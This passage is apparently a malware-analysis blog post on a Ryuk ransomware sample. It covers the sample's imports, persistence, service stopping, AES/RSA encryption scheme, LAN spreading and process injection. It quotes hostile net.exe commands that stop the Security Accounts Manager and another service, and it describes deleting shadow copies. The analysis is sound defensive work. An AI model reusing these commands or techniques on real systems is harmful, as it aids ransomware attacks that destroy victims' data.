<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ReadFile</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetFileSize</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetVersionExW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetFileAttributesW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetFileAttributesA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">FindClose</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WinExec</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Sleep</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ExitProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetCurrentProcess</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetLogicalDrives</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">SetFileAttributesW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetStartupInfoW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetTickCount</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetDriveTypeW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">mpr.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WNetOpenEnumW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WNetEnumResourceW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">WNetCloseEnum</span></div>
</td><td style="border-bottom: solid #000000 1pt; border-left: solid #000000 1pt; border-right: solid #000000 1pt; border-top: solid #000000 1pt; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">advapi32.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptEncrypt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptDecrypt</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptGenKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Cryp&DestroyKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptExportKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptImportKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptDeriveKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CryptAcquireContextW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetUserNameA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">GetUserNameW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegOpenKeyExA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegOpenKeyExW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegQueryValueExA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegCloseKey</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegDeleteValueW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">RegSetValueExW</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ole32.dll</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">ShellExecuteA</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">CoCreateInstance</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Shell32.dll</span></div>
</td></tr>
</tbody></table>
</div>
<h3 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Attack vector</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
This version of Ryuk ransomware was being distributed like a rouge password manager software with the ‘LithuanianicMercy.exe’ filename. The whole infection chain can be seen at <a href="https://app.any.run/tasks/5292e31f-a3ab-44ac-84ee-32a26bd7382e/">app.any.run sandbox</a>.<br />
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; padding: 0pt 0pt 12.75pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Installation</span></h3>
</div>
Ryuk checks the following registry key [SYSTEM\CurrentControlSet\Control\Nls\Language] for a language code. If the system language is Russian, Belarusian, or Ukrainian, the ransomware exits.<br />
<br />
To stay on the system, Ryuk sets the autorun registry key:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: #fefefe; color: black; font-family: "courier new"; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]</span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
After that, it creates a blank ‘1.txt’ file supposedly to check the write permissions for the current folder.<br />
<br />
<img height="39" src="https://lh4.googleusercontent.com/FB1m6H3gWfZkKi8HzS7IgugpuyKaLEqrW7-S5omvWg7XPR03ETfX2Aoz6bnwjiq79KAZ699oJDyXBzuJQKWei7fr3KjyMx0SQ5BX4nmhwwQKQxTFOfiokWcujs0Qz6aQ4m96WWp5" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="284" /></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Ryuk lanches numerous copies of itself with the ‘8 LAN’ string as a command-line argument and random name.<br />
<br />
Before encryption starts, Ryuk generates a seven lettered random filename using GetTickCount() and srand() function and then copies itself to the new generated file.<br />
<br />
<img height="215" src="https://lh3.googleusercontent.com/t1G3tgIws14Mdy31SBN9a-JkVOz8Un5f6Zcw_qdzyhHS1jdFeaMxd6Wfc--wX5-XM_uFeNhU3qf5_AwySSq3HCurnTbgKmatO6BqtgJpEF6RR4LU_GE9BOO-bjcz0wh6FNSzM3mX" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="438" /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 77px; overflow: hidden; width: 476px;"><img height="77" src="https://lh6.googleusercontent.com/00EPZVBXYmOCCiSZnx-GXxNMGxWCYzfUDyowtIBHicd0yJ7mlDorbzM8k6udFzrkMuv0vbDQauHqynNhUNdjTWzPjj3lXixjFDjR1POnrdvu5wU1VEdybE3zIYMR9mtL3exNQu1N" style="margin-left: 0px; margin-top: 0px;" width="476" /></span></span><span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 103px; overflow: hidden; width: 616px;"><img height="103" src="https://lh6.googleusercontent.com/MIiNsoA7G3HpXbrZNV9E5ZZTcq_o4cMHoQB3LRyj2Wh42h4HEo3_newFj9yOolwz93my033lJsIhJENHRWpPmiJDFAGssCqGYrC1wjKgVo2IUgRNSR3XtO6XTfx8l6b2JGCP7yUO" style="margin-left: 0px; margin-top: 0px;" width="616" /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
After some time Ryuk overloads the system by calling a lot of similar processes. It will not stop until the system is fully encrypted.<br />
<br />
<img height="163" src="https://lh6.googleusercontent.com/SokBGZsDYDTzGPe_QzeDrxV27Dp4OQtWQKJFfJfjsxrO3z51txaUUqLDKELSREIzd1XPDERxQsdU5cHC3e_159yYkfpsVzd_CxJ1OWRX3MXGufztuWFq5xzcEoTrqXzEg26IuINq" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="537" /></div>
The ransomware stops the following system services using ‘net.exe’ and ‘net1.exe’:<br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">C:\Windows\System32\net.exe stop audioendpointbuilder /y</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">C:\Windows\System32\net.exe stop samss /y</span></li>
</ul>
It is not clear why Ryuk stops the Windows Audio Endpoint Builder that leads to audio services malfunctioning on a victim's computer. However, the second one stops the Security Accounts Manager. Disabling this service will prevent other services in the system from being notified when the SAM is ready, which may in turn cause those services to fail to start correctly. This techniques can be used to prevent sending alerts generated by suspicious activities on the affected system to SIEM system.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<br />
After the encryption has been completed, the cryptolocker creates and executes a batch script 'window.bat' to delete backups and shadow copies.<br />
<br />
<img height="354" src="https://lh6.googleusercontent.com/IhSlEVGmNvfjr2mOlvrr0tZvbbSb4TriUroRv8u0j-EkXCwBl2e1dhTsLWO5OOefK5kAaBB0XuZTmxjTTGx7vpPNHJdQzkN5fhjnw636F35-0DCHKEx-Xf5SkW3aCgHWzoD7axWw" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="379" /></div>
<h3 style="background-color: white; line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; padding: 0pt 0pt 12.75pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Encryption</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Ryuk uses three-layer encryption with a conventional combination of symmetric AES for file encryption and asymmetric RSA for file keys encryption ciphers. However, the master public key, as well as the private key, is kept on the attacker’s side. Instead, the session key pair is hardcoded. The session private key is pre-encrypted by the master public key.<br />
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt;">
<span style="color: black; font-family: "arial"; font-size: 16pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Network encryption</span></h4>
<br /></div>
Ryuk avoids encrypting the files with the following extensions: <br />
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">exe </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">dll </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">ini </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">hrmlog </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">lnk</span></li>
</ul>
The directory whitelist where the ransomware does not encrypt files is as follows:<br />
<ul style="text-align: left;">
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">Windows </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">Mozilla </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">Chrome</span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; white-space: pre-wrap;">RecycleBin </span></li>
<li><span style="background-color: white; font-family: "arial"; font-size: 11pt; font-style: italic; vertical-align: baseline; white-space: pre-wrap;">Ahnlab</span><span style="background-color: white; font-family: "arial"; font-size: 10.5pt; vertical-align: baseline; white-space: pre-wrap;"> </span></li>
</ul>
<b style="font-weight: normal;"><br /></b>
<br />
The keys used in the encryption process are as follows:<br />
<ol style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">The master RSA key pair owned by the attacker. </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">RSA-2048 session key pair is hardcoded with the private key pre-encrypted by the master key.</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">AES-256 file keys.</span></li>
</ol>
<b style="font-weight: normal;"><br /></b>
<br />
The encryption process has the following steps:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;"><br /></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">1. Two files are created: </span></div>
<ul style="text-align: left;">
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">‘PUBLIC’ file that contains the public session key (RSA-2048) and </span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">‘UNIQUE_ID_DO_NOT_REMOVE’ file that contains the private session key (RSA-2048) pre-encrypted with the master key. This file should be uploaded to the attacker to enable file decryption.</span></li>
</ul>
The public session key looks as follows:<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 292px; overflow: hidden; width: 630px;"><img height="292" src="https://lh4.googleusercontent.com/QFLrW9C4oP-pS2o7hefaQ4CkJMrW512xGWrxyTyjPHnJbyv-YQv1t_hBapZPIuisBmx4ZyarwWN_a7KY5VA_Wc6w7U53ptD46jqpgLDPrkKEQdhc1jUpwWxUtvSYT-g2TTXpssY3" style="margin-left: 0px; margin-top: 0px;" width="630" /></span></span></div>
<span style="font-family: "arial"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">2. AES-256 file key is generated using CryptGenKey with Algorithm ID 0x6610 which corresponds to </span><span style="background-color: white; font-family: "arial"; font-size: 10pt; vertical-align: baseline; white-space: pre-wrap;">CALG_AES_256.</span><br />
<h1 dir="ltr" style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 116px; overflow: hidden; width: 335px;"><img height="116" src="https://lh4.googleusercontent.com/4vvE8SM_1hcjtap7MKFtxE3rXenEurmfYMHaG3LmKQHxOD6ExsrWbAAMtRiV4u3eFFN8wBTW6Mc6B03UnhOqMwnMG8Kdj-_bjAumOVY7BxmeHybgdOVGRNUsAe5Cytk5eZXaCEQI" style="margin-left: 0px; margin-top: 0px;" width="335" /></span></span></h1>
<span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">3. After that, a target file’s content is encrypted with AES key. </span><br />
<div>
<span style="font-family: "arial";"><span style="font-size: 14.6667px; white-space: pre-wrap;"><br /></span></span><span style="font-family: "arial"; font-size: 11pt; vertical-align: baseline; white-space: pre-wrap;">4. Finally, magic 'HERMES' and the AES key encrypted with the embedded RSA public key are added </span><span style="font-family: "arial"; font-size: 11pt; white-space: pre;">to the end of the encrypted file.</span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-indent: 36pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 84px; overflow: hidden; width: 690px;"><img height="84" src="https://lh3.googleusercontent.com/BOA40LTZx7A3yDflix3ts0SyOZDG9Er5BJHuPrTAyZe23qRErigfUA-CXrBKmCPssoHchOPErOcAuFB6kORS5UsEOPfUBTz9nWT_TOOXCUJgmifjnBHaTQXGf8tmaI0OcXs8I6Ps" style="margin-left: 0px; margin-top: 0px;" width="690" /></span></span></div>
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 18pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 16pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Network encryption</span></h4>
The ransomware finds other computers in a local network. To do that, it calls GetIpNetTable() function that enumerates the ARP entries for IPv4 on a local system from the IPv4 to the physical address mapping table and returns a list of IP addresses. These IPs point to available subnets that the victim’s host is connected to.</div>
<div>
<br /></div>
<div>
If an IP address discovered in the ARP cache belongs to one of the following ranges of internal IP addresses, Ryuk starts findinп potential victims in this subnet by enumerating all possible IP addresses:<br />
<ul>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">10.0.0.0 - 10.255.255.255</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">172.16.0.0 - 172.31.255.255</span></li>
<li><span style="font-family: "arial"; font-size: 11pt; white-space: pre-wrap;">192.168.0.0 - 192.168.255.255</span></li>
</ul>
Ryuk checks if the discovered IP address belongs to the ranges above.<span style="font-family: "arial"; font-size: 11pt; white-space: pre;"><br /></span>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 265px; overflow: hidden; width: 499px;"><img height="265" src="https://lh3.googleusercontent.com/7O_U475H9Zg6EBquqam5Cg-5s5fkv6oVG4ssShshHq8Vv39sp186CgpNuz8Z038bDhMdlkw_C5aaj5MYIiq6LJRDlJxyjPxRHHDbv5aBtzDQOneZaAmrwbdfkbndNzhQAYkS25jQ" style="margin-left: 0px; margin-top: 0px;" width="499" /></span></span></div>
<b style="font-weight: normal;"><br /></b>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
Finally, if a host in a local network responds, the ransomware tries to attach its disks as network drives and encrypt data on them.<br />
<h3 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt;">
<span style="color: black; font-family: "arial"; font-size: 20pt; font-weight: 400; vertical-align: baseline; white-space: pre;">Process injection</span></h3>
Ryuk uses SeDebugPrivilege() to elevate privileges to inject its payload into running processes.<br />
<br /></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span style="border: none; display: inline-block; height: 168px; overflow: hidden; width: 690px;"><img height="168" src="https://lh6.googleusercontent.com/L4HvZN9zWPtHc97Co5elGAxFcRP6jZ_W9-bse7zgJDkzWWOELGpp5mfvlaz4dfcqdUj6B7XpJsfWeoUtlo_eOC_n4idryk_kSOFN2yUvxtDPMfReQniC79yc5cBghXDA9ggz1bJa" style="margin-left: 0px; margin-top: 0px;" width="690" /></span></span></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The injection method is conventional. The ransomware allocates memory in a target process to write its payload code using WriteProcessMemory(). After that, Ryuk creates and starts the remote thread using CreateRemoteThread().<br />
<br />
<img height="256" src="https://lh5.googleusercontent.com/_vR98hk1VIRRzjpGFlrUw3n2TWHEH2sITzTkxwi9uAl-M1pwqIZfPzPN3uD7DhXJ8xRDXtydkFDfDGYeX6BCmXmln6fA0G_8VJcYMeuLxpRYqbRybMxZqDLNrRos07SBVnEO22fo" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="738" /></div>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
The ransomware avoids injecting into the Windows system processes such as 'lsaas.exe','explorer.exe', 'csrss.exe'.<br />
<br />
<img height="165" src="https://lh4.googleusercontent.com/YVnpRsNSCQnFx2ManjDoV773i2bPZOgSGFf0bwEuDGk9F4hEZs-WW2Ggf9Jsw_gskD_zaPe_sRzI9xgu04b_R8DsiK5Q-PsWEC8yb4XSANkWN4bwzJykbxm9bGlvlBUnDvKc9K0F" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="442" /></div>
<h3 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Ransomware notes</span></h3>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
After the encryption is completed, Ryuk leaves the ‘RyukReadMe.html’ with the following content:<br />
<br />
<img height="385" src="https://lh5.googleusercontent.com/VJGjIMtb1Hop1Ma0xxvhyzN2RnuQoFMSmcW0oPEiXc23pi-ncuqyKiXtYZdO8NpnReE3YrvtkPNQGSFx-pMMfR5-ba8W3gX8ASDFZs15b7u7AYU534sFrdxtuYcmQB2UhnNGjFuC" style="font-family: arial; font-size: 11pt; margin-left: 0px; margin-top: 0px; white-space: pre;" width="624" /></div>
<h4 style="line-height: 1.38; margin-bottom: 6pt; margin-top: 20pt; text-align: left;">
<span style="background-color: transparent; color: black; font-family: "arial"; font-size: 20pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Code Artefacts</span></h4>
The binary has the debugging information left in the code.<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
